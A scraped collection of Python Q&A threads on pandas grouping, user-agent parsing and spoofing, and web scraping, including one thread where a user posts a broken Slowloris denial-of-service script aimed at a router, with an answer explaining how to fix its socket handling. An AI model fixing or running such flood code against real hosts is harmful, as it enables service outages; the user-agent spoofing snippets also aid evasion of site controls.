Add new column to row in Pandas groupby - python

I'm trying to group my data frame by userID and iterate it by each user session, then add a new column to each session (row in the data frame), 0 or 1 depends on the condition, and upload all data (without grouping) to the new CSV file. But got the error.
IndexError: index 10243 is out of bounds for axis 0 with size 25
My code is:
csv_input = pd.read_csv('sm_data.csv', ';')
is_zero_session = []
for user_index, user_group in csv_input.groupby('browserData.userID', as_index=False):
prev_in_loop = None
for session_index, session in user_group.iterrows():
dt = datetime.datetime.fromtimestamp(session[23]).isoformat()
dt = datetime.datetime.strptime(dt, '%Y-%m-%dT%H:%M:%S')
if prev_in_loop is not None:
if (dt - prev_in_loop).seconds == 0:
csv_input.insert(session_index, 'is_zero_session', 1)
else:
csv_input.insert(session_index, 'is_zero_session', 0)
else:
csv_input.insert(session_index, 'is_zero_session', 0)
prev_in_loop = dt
csv_input['is_zero_session'] = is_zero_session
csv_input.to_csv('sm_data_zero_sessions.csv', sep=';', encoding='utf-8')
My data example:
;_id;browserData.cookieEnabled;browserData.firstSession;browserData.isFirstSession;browserData.languagesCount;browserData.mimeTypes;browserData.navigatorVendor;browserData.platform;browserData.pluginsCount;browserData.prevSession;browserData.productName;browserData.queryParams.0;browserData.queryParams.1;browserData.referrer;browserData.targetDomain;browserData.userAgent;browserData.userID;browserData.webDriver;serverData.noScript;serverData.userAgent;serverData.userCookies;serverData.userIp;serverData.userReferrer;sessionDate;sessionId;is_bot_status
0;5e1c862e0ccf197e0bb0482a;True;1578927662.0;True;4.0;0.0;Google Inc.;Linux aarch64;0.0;1578927662.0;Gecko;utm_source=lime.blocked.site;utm_medium=3666779|0.2765645|20200108;cabinet.lime-zaim.ru;Mozilla/5.0 (Linux; arm_64; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 YaBrowser/19.12.1.121.00 Mobile Safari/537.36;41393731-945b-4ec3-89ec-dc3b998eb3a5;False;Mozilla/5.0 (Linux; arm_64; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 YaBrowser/19.12.1.121.00 Mobile Safari/537.36;{ };178.34.161.101;https://creditjoy.ru/results/lime?utm_source=lime.blocked.site&utm_medium=3666779|0.2765645|20200108;1578927662;2e0736c8-8fce-4057-a6bd-c8d9146dc595;0
1;5e1c863bdfb6b2b567d6c778;True;1578927675.0;True;4.0;0.0;Google Inc.;Linux armv8l;0.0;1578927675.0;Gecko;creditjoy.ru;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;aed6a2cf-c8d8-4346-bd27-db6b36f422b1;False;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;{ };85.140.4.13;https://creditjoy.ru/go/ffc7726c-f110-4a2d-a271-e9ac40313011;1578927675;744fc0a7-bfbe-47c8-8815-1b3451e4bcda;0
2;5e1c8649458f1a5883d6db29;True;1578927689.0;True;1.0;0.0;Apple Computer, Inc.;iPhone;0.0;1578927689.0;Gecko;utm_source=lime.blocked.site;utm_medium=1222847|0|20200113;cabinet.lime-zaim.ru;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;85643f44-8c93-4207-ab57-34d14b2ba651;False;False;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;{ };94.25.174.100;https://creditjoy.ru/;1578927689;f1184559-a8a2-45b7-b17e-78f7b68343ed;0
3;5e1c864acdc167e5f5e2e55d;True;1578927690.0;True;2.0;9.0;Google Inc.;Win32;5.0;1578927690.0;Gecko;utm_source=konga.blocked.site;utm_medium=1292099|0.02499068|20200113;cabinet.konga.ru;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;dc9bd672-a04d-4c17-aa07-3113645d0f61;False;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;{ };37.29.40.57;https://creditjoy.ru/results/konga?utm_source=konga.blocked.site&utm_medium=1292099|0.02499068|20200113;1578927690;b3f645bc-92c6-42db-aba6-2ca1ac40d0c9;0
4;5e1c865469dd649b8fd98d9e;True;1578927675.0;False;4.0;0.0;Google Inc.;Linux armv8l;0.0;1578927675.0;Gecko;creditjoy.ru;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;aed6a2cf-c8d8-4346-bd27-db6b36f422b1;False;Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36;{ };85.140.4.13;https://creditjoy.ru/go/e241b708-ee3e-4b55-bcba-bc898bbab799;1578927700;1d42d936-1e74-4e75-8528-2e31c18fe39a;0
5;5e1c865fdfb6b2b567d6c779;True;1578927690.0;False;2.0;9.0;Google Inc.;Win32;5.0;1578927690.0;Gecko;creditjoy.ru;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;dc9bd672-a04d-4c17-aa07-3113645d0f61;False;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 YaBrowser/19.12.3.320 Yowser/2.5 Safari/537.36;{ };37.29.40.57;https://creditjoy.ru/go/c7e65b52-db79-4240-abb6-27353d58d452;1578927711;7e2774b1-f6ae-4d1f-9f0d-746379af764b;0
6;5e1c86634f2e3db798f6d1bf;True;1578927715.0;True;4.0;0.0;Google Inc.;Linux armv8l;0.0;1578927715.0;Gecko;utm_source=lime.blocked.site;utm_medium=3063107%7C0.6145995%7C20191204;cabinet.lime-zaim.ru;Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36;5b171e87-212e-4c9f-a7c9-a39ac84808b6;False;Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36;{ };178.176.165.219;https://creditjoy.ru/results/lime?utm_source=lime.blocked.site&utm_medium=3063107%7C0.6145995%7C20191204;1578927715;c4d61f02-a049-45c7-add8-701ab71d9096;0
7;5e1c8669cdc167e5f5e2e55e;True;1578927721.0;True;4.0;2.0;Win32;1.0;1578927721.0;Gecko;utm_source=konga.blocked.site;utm_medium=807071|0|20200113;cabinet.konga.ru;Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0;c3012df3-7649-48fc-b576-6fe3056a8d64;False;False;Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0;{ };217.175.11.223;https://creditjoy.ru/results/konga?utm_source=konga.blocked.site&utm_medium=807071|0|20200113;1578927721;78b7264f-4756-468c-8699-34c1b029dfb1;0
8;5e1c866e0ccf197e0bb0482b;True;1578927725.0;True;1.0;0.0;Apple Computer, Inc.;iPhone;0.0;1578927725.0;Gecko;utm_source=lime.blocked.sms;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;621c9de7-ea86-4703-849c-74a15cdc641b;False;False;Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1;{ };109.197.204.92;https://creditjoy.ru/;1578927726;1e8ca2bf-01fa-4491-9513-f2d8cbaf33f2;0
9;5e1c86735a10b4df2729d1fb;True;1578927731.0;True;4.0;0.0;Google Inc.;Linux armv7l;0.0;1578927731.0;Gecko;utm_source=lime.blocked.site;utm_medium=4095508|0.1009313|20200111;cabinet.lime-zaim.ru;Mozilla/5.0 (Linux; Android 8.0.0; FIG-LX1 Build/HUAWEIFIG-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36;510fd9a0-53dd-44b7-8bea-e1f9c95dd22a;False;Mozilla/5.0 (Linux; Android 8.0.0; FIG-LX1 Build/HUAWEIFIG-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36;{ };213.234.251.141;https://creditjoy.ru/results/lime?utm_source=lime.blocked.site&utm_medium=4095508%7C0.1009313%7C20200111;1578927731;41dd5a71-2254-4235-b046-19a5894fd810;0
10;5e1c868a69dd649b8fd98d9f;True;1578927595.0;False;4.0;4.0;Google Inc.;Win32;3.0;1578927595.0;Gecko;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36;5232fbdb-beb7-48f1-8518-2b64a82e411b;False;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36;{ };213.247.198.140;https://creditjoy.ru/results/konga?utm_source=konga.blocked.site&utm_medium=490763|0.5122826|20191225;1578927754;03fe45d8-fceb-491d-a0d4-24328d14805c;0
I have 16659 rows in my df
I need to group row data (not grouped) by 'browserData.userID', get all sessions for each group (user), count time between and append to each session 0 or 1 by condition and save not grouped data to file. I'm a newbie in Pandas, what I'm doing wrong?

Related

python uer-agents pakage: why does the package parse the string not correctly?

I want to parse 3 additional information(browser, device and os) from below sample csv file->AGN column
_time,AGN,emoloyee
2022-08-30T17:54:18.796+0000,"[Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36]",employeeA
2022-08-30T12:56:35.927+0000,"[Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36]",employeeB
2022-06-06T07:27:31.647+0000,"[Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.27]",employeeC
Here is the code i used:
import pandas as pd
from user_agents import parse
df1_identifyDevice['AGN']=df1_identifyDevice['AGN'].str.strip('[]')
for item in df1_identifyDevice['AGN']:
user_agent = parse(item)
print(item)
df1_identifyDevice['browser'] = user_agent.browser.family
df1_identifyDevice['os'] = user_agent.os.family
df1_identifyDevice['device'] = user_agent.device.family
But above seems not parse the information correctly.
for browser- it all return 'Safari' as result
for 'os' - it all return 'Mac os c' as result
for 'device' - it all return 'Mac' as reuslt
Please refer to below running result:
Can you please help take a look what's wrong with the code?

How to make a fingerprint of Chrome 79 using Selenium

I tried this line of code and it didn't work:
option.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
The fingerprint shown on selenium is the same as in google chrome. Please help me out! I'd really appreciate it.
You can set any of the supported user-agent of Chrome v79 using the execute_cdp_cmd() command as follows:
Code Block:
driver = webdriver.Chrome(service=s, options=options)
print("Default UserAgent is: "+driver.execute_script("return navigator.userAgent;"))
# Setting user agent as Chrome/79.0.3945.36
driver.execute_cdp_cmd('Network.setUserAgentOverride', {"userAgent": 'Mozilla/5.0 (Linux; Android 10; Generic Android-x86_64 Build/QD1A.190821.014.C2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.36 Safari/537.36'})
print(driver.execute_script("return navigator.userAgent;"))
# Setting user agent as Chrome/79.0.3945.130
driver.execute_cdp_cmd('Network.setUserAgentOverride', {"userAgent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'})
print(driver.execute_script("return navigator.userAgent;"))
# Setting user agent as Chrome/79.0.3945.0
driver.execute_cdp_cmd('Network.setUserAgentOverride', {"userAgent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36'})
print(driver.execute_script("return navigator.userAgent;"))
# Setting user agent as Chrome/79.0.3945.117
driver.execute_cdp_cmd('Network.setUserAgentOverride', {"userAgent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'})
print(driver.execute_script("return navigator.userAgent;"))
# Setting user agent as Chrome/79.0.3945.88
driver.execute_cdp_cmd('Network.setUserAgentOverride', {"userAgent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'})
print(driver.execute_script("return navigator.userAgent;"))
Console Output:
Default UserAgent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36
Mozilla/5.0 (Linux; Android 10; Generic Android-x86_64 Build/QD1A.190821.014.C2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.36 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36

Multi socket connection to server Python

I get this error within python socket. My aim is to create a slow lorris attack but I am having problems with getting multi connections to my router within the one program
I want to get the amount of sockets within a list to call
import socket
import time
import os
import random
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
def clear():
os.system("cls")
print("Starting...")
print("press enter to start")
agreement = input("")
port = 445
port_s = str(port)
socket.settimeout(4)
list_of_sockets = []
import socket
servers = [] #add servers here
if agreement == "":
clear()
print("")
print("welcome...")
target = input("ip target>>>")
print("defult port is " + port_s)
print("-" * 10 + " START " + "-" * 10)
print("")
def connect_to():
int_nob = int(200)#num of bots
for x in range(0, int_nob):
print(int(int_nob))
int_nob -= 1
int_nob = socket.connect((target, port))
int_nob.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
client = new Client()
if int_nob == 0:
print(list_of_sockets)
print("resending sockets of " + int_nob)
while True:
connect_to()
else:
print("breaking...")
exit()
error
Traceback (most recent call last):
File "C:\Users\townte23\Desktop\slow lorris,.py", line 78, in <module>
connect_to()
File "C:\Users\townte23\Desktop\slow lorris,.py", line 71, in connect_to
a = socket.connect((target, port))
OSError: [WinError 10056] A connect request was made on an already connected socket
I did cannibalize someone elses code but most of it is mine
https://github.com/gkbrk/slowloris/blob/master/slowloris.py
I did find a similar issue but it was a server issue so I'm not sure how to approach this error
Edit: found the problem and the solution
int_nob = int(200)
for
int_nob = socket.connect(())
int_nob.send(bytes("thing"))
int_nob -= 1
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
...
def connect_to():
...
for x in range(0, int_nob):
...
a = socket.connect((target, port))
...
while True:
connect_to()
You cannot do multiple connects with the same socket but you have to create a new socket for each new connection. Apart from that it is very confusing that you call your socket simply socket since this conflicts in name with the module socket you import.

Urllib3 HTTP Error 502: Bad Gateway

I am trying to scrape zk.fm in order to download music, but it's giving me some trouble. I'm using urllib3 to generate a response, but this always yields a Bad Gateway error. Accessing the website through a browser works perfectly fine.
This is my code (with a random fake user-agent). I'm trying to access "http://zk.fm/mp3/search?keywords=" followed by some keywords which indicate the song name and artist, for example "http://zk.fm/mp3/search?keywords=childish+gambino+heartbeat".
from bs4 import BeautifulSoup
from random import choice
import urllib3
desktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']
def random_headers():
return {'User-Agent': choice(desktop_agents)}
ua = random_headers()
http = urllib3.PoolManager(10,headers=user_agent)
response = http.request('GET',"http://zk.fm/mp3/search?
keywords=childish+gambino+heartbeat")
soup = BeautifulSoup(response.data)
Is there a way to work around the 502 Error, or is it out of my control?
You need to enable the persistence of cookies, then access, in order, the site home page followed by the search URL. I suggest (personally) python-requests, but it is up to you. See here for discussion.
I tested this by visiting the search page - error 502. visit home page - 200. visit search - 200. clear cookies and visit search again - 502. So it must be cookies that are the problem.

Web parsing with python beautifulsoup producing inconsistent result

I am trying to parse the table of this site. I am using python beautiful soup to do that. While it's producing correct output in my Ubuntu 14.04 machine, it's producing wrong output in my friend's windows machine. I am pasting the code snippet here:
from bs4 import BeautifulSoup
def buildURL(agi, families):
#agi and families contains space seperated string of genes and families
genes = agi.split(" ")
families = families.split(" ")
base_url = "http://www.athamap.de/search_gene.php"
url = base_url
if len(genes):
url = url + "?agi="
for i, gene in enumerate(genes):
if i>0:
url = url + "%0D%0A"
url = url + gene
url = url + "&upstream=-500&downstream=50&restriction=0&sortBy1=gen&sortBy2=fac&sortBy3=pos"
for family in families:
family = family.replace("/", "%2F")
url = url +"&familySelected%5B"+family+"%5D=on"
url = url + "&formSubmitted=TRUE"
return url
def fetch_html(agi, families):
url = buildURL(agi, families)
response = requests.get(url)
soup = BeautifulSoup(str(response.text), "lxml")
divs = soup.find_all('div')
seldiv = ""
for div in divs:
try:
if div["id"] == "geneAnalysisDetail":
'''
This div contains interesting data
'''
seldiv = div
except:
None
return seldiv
def parse(seldiv):
soup = seldiv
rows= soup.find_all('tr')
attributes =["Gene", "Factor", "Family", "Position", "Relative orientation", "Relative Distance", "Max score", "Threshold Score", "Score"]
print attributes
save_rows = []
for i in range(2, len(rows)):
cols = rows[i].find_all('td')
lst = []
for j,col in enumerate(cols):
if j==0:
lst.append(re.sub('', '',str(col.contents[1].contents[0])))
elif j==1:
lst.append(str(col.contents[1].contents[0]))
elif j==2:
lst.append(str(col.contents[0]))
elif j==3:
lst.append(str(col.contents[1].contents[0]))
else:
lst.append(str(col.contents[0]))
save_rows.append(lst)
return save_rows
Any idea what could go wrong here? I have tried with and without lxml.
Thanks in advance.
You can parse the table this way and should work well on both machine. buildURL function should be left unchanged.
import requests
from bs4 import BeautifulSoup
def fetch_html(url):
response = requests.get(url)
soup = BeautifulSoup(response.text, "lxml")
seldiv = soup.find("div", id="geneAnalysisDetail")
return seldiv
def parse(url):
soup = fetch_html(url)
rows= soup.find_all("tr")
attributes = ["Gene", "Factor", "Family", "Position", "Relative orientation", "Relative Distance", "Max score", "Threshold Score", "Score"]
save_rows = []
for i in range(2, len(rows)):
cols = rows[i].find_all("td")
lst = []
for col in cols:
text = col.get_text()
text = text.strip(" ")
text = text.strip("\n")
lst.append(text)
save_rows.append(lst)
return save_rows
url = "http://www.athamap.de/search_gene.php?agi=At1g76540%0D%0AAt3g12280%0D%0AAt4g28980%0D%0AAt4g37630%0D%0AAt5g11300%0D%0AAt5g27620%0D%0A&upstream=-500&downstream=50&restriction=0&sortBy1=gen&sortBy2=fac&sortBy3=pos&familySelected[ARF]=on&familySelected[CAMTA]=on&familySelected[GARP%2FARR-B]=on&formSubmitted=TRUE"
save_rows = parse(url)
for row in save_rows:
print(row)
One possibility is that you didn't add user agent for the requests. Different user agent will get different result sometime, especially from weird website. Here is a list of all possible agents, just choose one. It doesn't have to be your machine
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
]

Categories

Resources